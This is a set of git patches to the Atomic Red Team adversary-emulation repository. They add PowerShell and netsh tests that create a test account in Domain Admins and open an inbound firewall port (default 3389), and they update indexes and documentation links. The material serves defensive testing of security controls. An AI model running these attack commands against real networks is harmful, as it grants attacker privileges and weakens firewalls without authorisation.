From 6f3085ee178a31498405cb5f42a60d9428ff061c Mon Sep 17 00:00:00 2001
From: Jil Larner <Jil@users.noreply.github.com>
Date: Mon, 17 Aug 2020 18:09:53 +0200
Subject: [PATCH 01/19] T1098 - Implemented domain account manipulation (#1201)

* Implemented Domain account manipulation

* remove manually specified GUID

removing GUID so it can be assigned at merge time.

Co-authored-by: Didier Cambefort <didier.cambefort@scrt.ch>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1098/T1098.yaml | 63 ++++++++++++++++++++++++++++++++++++++++
 1 file changed, 63 insertions(+)

diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml
index 6975f5ac..75aa110d 100644
--- a/atomics/T1098/T1098.yaml
+++ b/atomics/T1098/T1098.yaml
@@ -28,3 +28,66 @@ atomic_tests:
     name: powershell
     elevation_required: true
 
+- name: Domain Account and Group Manipulate
+  description: |
+    Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). 
+    
+    The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,
+    you need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to 
+    create the user and alter the group. Automatic installation of the dependency requires an elevated session, 
+    and is unlikely to work with Powershell Core (untested).
+
+    If you consider running this test against a production Active Directory, the good practise is to create a dedicated
+    service account whose delegation is given onto a dedicated OU for user creation and deletion, as well as delegated
+    as group manager of the target group.
+
+    Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }`
+  supported_platforms:
+  - windows
+  input_arguments:
+    account_prefix:
+      description: |
+        Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on
+        a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful.
+      type: String
+      default: atr-
+    group:
+      description: Name of the group to alter
+      type: String
+      default: "Domain Admins"
+    create_args:
+      description: Additional string appended to New-ADUser call 
+      type: String
+      default: ""
+  dependencies:
+  - description: |
+      PS Module ActiveDirectory
+    prereq_command: |
+      Try {
+          Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+          exit 0
+      } 
+      Catch {
+          exit 1
+      }
+    get_prereq_command: |
+      if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+        Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+      } else {
+        Install-WindowsFeature RSAT-AD-PowerShell
+      }
+  executor:
+    command: |
+      $x = Get-Random -Minimum 2 -Maximum 99
+      $y = Get-Random -Minimum 2 -Maximum 99
+      $z = Get-Random -Minimum 2 -Maximum 99
+      $w = Get-Random -Minimum 2 -Maximum 99
+
+      Import-Module ActiveDirectory
+      $account = "#{account_prefix}-$x$y$z"
+      New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}
+      Add-ADGroupMember "#{group}" $account
+    cleanup_command: |
+      Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False
+    name: powershell
+

From 1427393485a5a4f98fbbf8b2ef2f610b703f211d Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 17 Aug 2020 16:10:14 +0000
Subject: [PATCH 02/19] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 59 ++++++++++++++
 atomics/T1098/T1098.md                        | 79 +++++++++++++++++++
 atomics/T1098/T1098.yaml                      |  1 +
 atomics/used_guids.txt                        |  1 +
 8 files changed, 144 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 76477b2f..cdc465b8 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -82,6 +82,7 @@ persistence,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,9
 persistence,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
 persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
+persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index e6b9267c..c21a6702 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -193,6 +193,7 @@ defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1
 defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt
 persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
+persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index addbc85e..7c83286b 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -176,6 +176,7 @@
   - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
   - Atomic Test #1: Admin Account Manipulate [windows]
+  - Atomic Test #2: Domain Account and Group Manipulate [windows]
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1098.001 Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 9b2fe722..a81fc672 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -374,6 +374,7 @@
   - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
   - Atomic Test #1: Admin Account Manipulate [windows]
+  - Atomic Test #2: Domain Account and Group Manipulate [windows]
 - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index f910c7a2..1b7c1f46 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -8461,6 +8461,65 @@ persistence:
               }
         name: powershell
         elevation_required: true
+    - name: Domain Account and Group Manipulate
+      auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9
+      description: "Create a random atr-nnnnnnnn account and add it to a domain group
+        (by default, Domain Admins). \n\nThe quickest way to run it is against a domain
+        controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,\nyou need
+        to install PS Module ActiveDirectory (in prereqs) and run the script with
+        appropriare AD privileges to \ncreate the user and alter the group. Automatic
+        installation of the dependency requires an elevated session, \nand is unlikely
+        to work with Powershell Core (untested).\n\nIf you consider running this test
+        against a production Active Directory, the good practise is to create a dedicated\nservice
+        account whose delegation is given onto a dedicated OU for user creation and
+        deletion, as well as delegated\nas group manager of the target group.\n\nExample:
+        `Invoke-AtomicTest -Session $session 'T1098' -TestNames \"Domain Account and
+        Group Manipulate\" -InputArgs @{\"group\" = \"DNSAdmins\" }`\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        account_prefix:
+          description: |
+            Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on
+            a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful.
+          type: String
+          default: atr-
+        group:
+          description: Name of the group to alter
+          type: String
+          default: Domain Admins
+        create_args:
+          description: Additional string appended to New-ADUser call
+          type: String
+          default: ''
+      dependencies:
+      - description: 'PS Module ActiveDirectory
+
+'
+        prereq_command: "Try {\n    Import-Module ActiveDirectory -ErrorAction Stop
+          | Out-Null\n    exit 0\n} \nCatch {\n    exit 1\n}\n"
+        get_prereq_command: |
+          if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+            Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+          } else {
+            Install-WindowsFeature RSAT-AD-PowerShell
+          }
+      executor:
+        command: |
+          $x = Get-Random -Minimum 2 -Maximum 99
+          $y = Get-Random -Minimum 2 -Maximum 99
+          $z = Get-Random -Minimum 2 -Maximum 99
+          $w = Get-Random -Minimum 2 -Maximum 99
+
+          Import-Module ActiveDirectory
+          $account = "#{account_prefix}-$x$y$z"
+          New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}
+          Add-ADGroupMember "#{group}" $account
+        cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))"
+          | Remove-ADUser -Confirm:$False
+
+'
+        name: powershell
   T1098.003:
     technique:
       external_references:
diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md
index 10ff8ce7..0fc6af21 100644
--- a/atomics/T1098/T1098.md
+++ b/atomics/T1098/T1098.md
@@ -6,6 +6,8 @@
 
 - [Atomic Test #1 - Admin Account Manipulate](#atomic-test-1---admin-account-manipulate)
 
+- [Atomic Test #2 - Domain Account and Group Manipulate](#atomic-test-2---domain-account-and-group-manipulate)
+
 
 <br/>
 
@@ -45,4 +47,81 @@ foreach($member in $fmm) {
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Domain Account and Group Manipulate
+Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). 
+
+The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,
+you need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to 
+create the user and alter the group. Automatic installation of the dependency requires an elevated session, 
+and is unlikely to work with Powershell Core (untested).
+
+If you consider running this test against a production Active Directory, the good practise is to create a dedicated
+service account whose delegation is given onto a dedicated OU for user creation and deletion, as well as delegated
+as group manager of the target group.
+
+Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }`
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| account_prefix | Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on
+a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful. | String | atr-|
+| group | Name of the group to alter | String | Domain Admins|
+| create_args | Additional string appended to New-ADUser call | String | |
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$x = Get-Random -Minimum 2 -Maximum 99
+$y = Get-Random -Minimum 2 -Maximum 99
+$z = Get-Random -Minimum 2 -Maximum 99
+$w = Get-Random -Minimum 2 -Maximum 99
+
+Import-Module ActiveDirectory
+$account = "#{account_prefix}-$x$y$z"
+New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}
+Add-ADGroupMember "#{group}" $account
+```
+
+#### Cleanup Commands:
+```powershell
+Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: PS Module ActiveDirectory
+##### Check Prereq Commands:
+```powershell
+Try {
+    Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+    exit 0
+} 
+Catch {
+    exit 1
+} 
+```
+##### Get Prereq Commands:
+```powershell
+if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+  Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+} else {
+  Install-WindowsFeature RSAT-AD-PowerShell
+}
+```
+
+
+
+
 <br/>
diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml
index 75aa110d..73a14391 100644
--- a/atomics/T1098/T1098.yaml
+++ b/atomics/T1098/T1098.yaml
@@ -29,6 +29,7 @@ atomic_tests:
     elevation_required: true
 
 - name: Domain Account and Group Manipulate
+  auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9
   description: |
     Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). 
     
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 1b91ea58..a25259c9 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -565,3 +565,4 @@ b5656f67-d67f-4de8-8e62-b5581630f528
 1620de42-160a-4fe5-bbaf-d3fef0181ce9
 db020456-125b-4c8b-a4a7-487df8afb5a2
 804f28fc-68fc-40da-b5a2-e9d0bce5c193
+a55a22e9-a3d3-42ce-bd48-2653adb8f7a9

From f294dedadc1fc9be444bca0bfcd332e87f09ad1b Mon Sep 17 00:00:00 2001
From: Tsora-Pop <35981510+Tsora-Pop@users.noreply.github.com>
Date: Mon, 17 Aug 2020 11:14:16 -0500
Subject: [PATCH 03/19] New T1562.004 Test "Open local port through Windows
 Firewall for any profile" (#1200)

* Update T1562.004.yaml

added new atomic test to open a port through Windows Firewall to any profile

* Update T1562.004.yaml

added some fixes to command and cleanup

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1562.004/T1562.004.yaml | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml
index cb52d1d4..c234e0e2 100644
--- a/atomics/T1562.004/T1562.004.yaml
+++ b/atomics/T1562.004/T1562.004.yaml
@@ -61,3 +61,17 @@ atomic_tests:
     cleanup_command: netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localport=450 >nul 2>&1
     name: command_prompt
     elevation_required: true
+- name: Open a local port through Windows Firewall to any profile
+  description: This test will attempt to open a local port defined by input arguments to any profile
+  supported_platforms:
+  - windows
+  input_arguments:
+    local_port:
+      description: This is the local port you wish to test opening
+      type: integer
+      default: 3389
+  executor:
+    command: netsh advfirewall firewall add rule name="Open Port to Any" dir=in protocol=tcp localport=#{local_port} action=allow profile=any
+    cleanup_command: netsh advfirewall firewall delete rule name="Open Port to Any"
+    name: powershell
+    elevation_required: true

From 405126235f21367c28e69bcdab6c045a71255228 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 17 Aug 2020 16:14:43 +0000
Subject: [PATCH 04/19] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 18 ++++++++++
 atomics/T1562.004/T1562.004.md                | 35 +++++++++++++++++++
 atomics/T1562.004/T1562.004.yaml              |  1 +
 atomics/used_guids.txt                        |  1 +
 8 files changed, 59 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index cdc465b8..69df03ea 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -249,6 +249,7 @@ defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable iptables f
 defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
 defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
 defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index c21a6702..24a2d7de 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -81,6 +81,7 @@ defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HT
 defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,9,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,10,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,11,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 7c83286b..af181089 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -517,6 +517,7 @@
   - Atomic Test #2: Disable Microsoft Defender Firewall [windows]
   - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
   - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
+  - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
 - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
   - Atomic Test #1: Disable syslog [linux]
   - Atomic Test #2: Disable Cb Response [linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index a81fc672..7880cd3c 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -170,6 +170,7 @@
   - Atomic Test #2: Disable Microsoft Defender Firewall [windows]
   - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
   - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
+  - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
 - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
   - Atomic Test #9: Unload Sysmon Filter Driver [windows]
   - Atomic Test #10: Uninstall Sysmon [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 1b7c1f46..2d4744b5 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -23747,6 +23747,24 @@ defense-evasion:
           protocol=TCP localport=450 >nul 2>&1
         name: command_prompt
         elevation_required: true
+    - name: Open a local port through Windows Firewall to any profile
+      auto_generated_guid: 9636dd6e-7599-40d2-8eee-ac16434f35ed
+      description: This test will attempt to open a local port defined by input arguments
+        to any profile
+      supported_platforms:
+      - windows
+      input_arguments:
+        local_port:
+          description: This is the local port you wish to test opening
+          type: integer
+          default: 3389
+      executor:
+        command: netsh advfirewall firewall add rule name="Open Port to Any" dir=in
+          protocol=tcp localport=#{local_port} action=allow profile=any
+        cleanup_command: netsh advfirewall firewall delete rule name="Open Port to
+          Any"
+        name: powershell
+        elevation_required: true
   T1562.001:
     technique:
       created: '2020-02-21T20:32:20.810Z'
diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md
index 45a3cf09..60c112e6 100644
--- a/atomics/T1562.004/T1562.004.md
+++ b/atomics/T1562.004/T1562.004.md
@@ -14,6 +14,8 @@ Modifying or disabling a system firewall may enable adversary C2 communications,
 
 - [Atomic Test #4 - Opening ports for proxy - HARDRAIN](#atomic-test-4---opening-ports-for-proxy---hardrain)
 
+- [Atomic Test #5 - Open a local port through Windows Firewall to any profile](#atomic-test-5---open-a-local-port-through-windows-firewall-to-any-profile)
+
 
 <br/>
 
@@ -136,4 +138,37 @@ netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localp
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - Open a local port through Windows Firewall to any profile
+This test will attempt to open a local port defined by input arguments to any profile
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| local_port | This is the local port you wish to test opening | integer | 3389|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+netsh advfirewall firewall add rule name="Open Port to Any" dir=in protocol=tcp localport=#{local_port} action=allow profile=any
+```
+
+#### Cleanup Commands:
+```powershell
+netsh advfirewall firewall delete rule name="Open Port to Any"
+```
+
+
+
+
+
 <br/>
diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml
index c234e0e2..a9aeb382 100644
--- a/atomics/T1562.004/T1562.004.yaml
+++ b/atomics/T1562.004/T1562.004.yaml
@@ -62,6 +62,7 @@ atomic_tests:
     name: command_prompt
     elevation_required: true
 - name: Open a local port through Windows Firewall to any profile
+  auto_generated_guid: 9636dd6e-7599-40d2-8eee-ac16434f35ed
   description: This test will attempt to open a local port defined by input arguments to any profile
   supported_platforms:
   - windows
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index a25259c9..16301ed5 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -566,3 +566,4 @@ b5656f67-d67f-4de8-8e62-b5581630f528
 db020456-125b-4c8b-a4a7-487df8afb5a2
 804f28fc-68fc-40da-b5a2-e9d0bce5c193
 a55a22e9-a3d3-42ce-bd48-2653adb8f7a9
+9636dd6e-7599-40d2-8eee-ac16434f35ed

From af15596708fca975556b09b6e331b0b7147df523 Mon Sep 17 00:00:00 2001
From: Carrie Roberts <clr2of8@gmail.com>
Date: Tue, 18 Aug 2020 11:21:07 -0600
Subject: [PATCH 05/19] Add link to new Wiki page on contributing (#1193)

* point to wiki

* just edit link on top to point to new wiki
---
 docs/contributing.md | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/docs/contributing.md b/docs/contributing.md
index 4ad4f30a..eb87acb6 100644
--- a/docs/contributing.md
+++ b/docs/contributing.md
@@ -3,8 +3,7 @@ layout: default
 ---
 
 # Contributing to Atomic Red Team
-*NOTE: We have sweet stickers for people who contribute; if you’re interested send a message to 
-gear@redcanary.com with your mailing address*
+*NOTE: An updated version of this contributing reference is found over on the Wiki [here](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) *
 
 - [Atomic Philosophy](#atomic-philosophy)
 - [How to contribute](#how-to-contribute)

From 9293e1810228f78785ab9b48d3c32cd89c92454e Mon Sep 17 00:00:00 2001
From: Carrie Roberts <clr2of8@gmail.com>
Date: Tue, 18 Aug 2020 11:31:09 -0600
Subject: [PATCH 06/19] Update the Readme to point to the new Wiki (#1192)

* readme points to wiki now

* update readme
---
 README.md | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/README.md b/README.md
index 6c88ff3e..3b79cc8a 100644
--- a/README.md
+++ b/README.md
@@ -5,7 +5,7 @@
 
 Atomic Red Team allows every security team to test their controls by executing simple
 "atomic tests" that exercise the same techniques used by adversaries (all mapped to
-[Mitre's ATT&CK](https://attack.mitre.org/wiki/Main_Page)).
+[Mitre's ATT&CK](https://attack.mitre.org)).
 
 ## Philosophy
 
@@ -38,14 +38,14 @@ Join the community on Slack at [https://atomicredteam.slack.com](https://atomicr
 
 ## Getting Started
 
-* [Getting Started With Atomic Tests](https://atomicredteam.io/testing)
+* [Getting Started With Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/wiki/About-Atomic-Red-Team)
 * Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks)
 * Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index-by-tactic.md)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md)
   - Windows [Matrix](atomics/Indexes/Matrices/windows-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/windows-index.md), [csv](atomics/Indexes/Indexes-CSV/windows-index.csv))
   - MacOS [Matrix](atomics/Indexes/Matrices/macos-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/macos-index.md), [csv](atomics/Indexes/Indexes-CSV/macos-index.csv))
   - Linux [Matrix](atomics/Indexes/Matrices/linux-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/linux-index.md), [csv](atomics/Indexes/Indexes-CSV/linux-index.csv))
 * Using [ATT&CK Navigator](https://github.com/mitre-attack/attack-navigator)? Check out our coverage layers ([All](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json), [Windows](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json), [MacOS](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json), [Linux](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json))
-* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://atomicredteam.io/contributing) your own modifications
+* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) your own modifications
 * Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
     * Need a Slack invitation? Grab one at [https://slack.atomicredteam.io/](https://slack.atomicredteam.io/)
 

From c288b163f7d40dd03687d44eb86b1e3e744a96ba Mon Sep 17 00:00:00 2001
From: Jesse Brown <jesse.brown@redcanary.com>
Date: Tue, 18 Aug 2020 13:34:31 -0400
Subject: [PATCH 07/19] [UPDATE] COR_PROFILER to new ID (T1574.012) (#1191)

* [UPDATE] COR_PROFILER technique

* remove md file

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1546.015/T1546.015.md                | 182 ------------------
 .../T1574.012.yaml}                           |  34 ++--
 .../bin/T1574.012x64.dll}                     | Bin
 .../src/atomicNotepad.sln                     |   0
 .../src/atomicNotepad/atomicNotepad.vcxproj   |   0
 .../atomicNotepad.vcxproj.filters             |   0
 .../atomicNotepad/atomicNotepad.vcxproj.user  |   0
 .../src/atomicNotepad/dllmain.cpp             |   0
 .../src/atomicNotepad/framework.h             |   0
 .../src/atomicNotepad/pch.cpp                 |   0
 .../src/atomicNotepad/pch.h                   |   0
 .../src/x64/Release/atomicNotepad.dll         | Bin
 12 files changed, 20 insertions(+), 196 deletions(-)
 delete mode 100644 atomics/T1546.015/T1546.015.md
 rename atomics/{T1546.015/T1546.015.yaml => T1574.012/T1574.012.yaml} (83%)
 rename atomics/{T1546.015/bin/T1546.015x64.dll => T1574.012/bin/T1574.012x64.dll} (100%)
 rename atomics/{T1546.015 => T1574.012}/src/atomicNotepad.sln (100%)
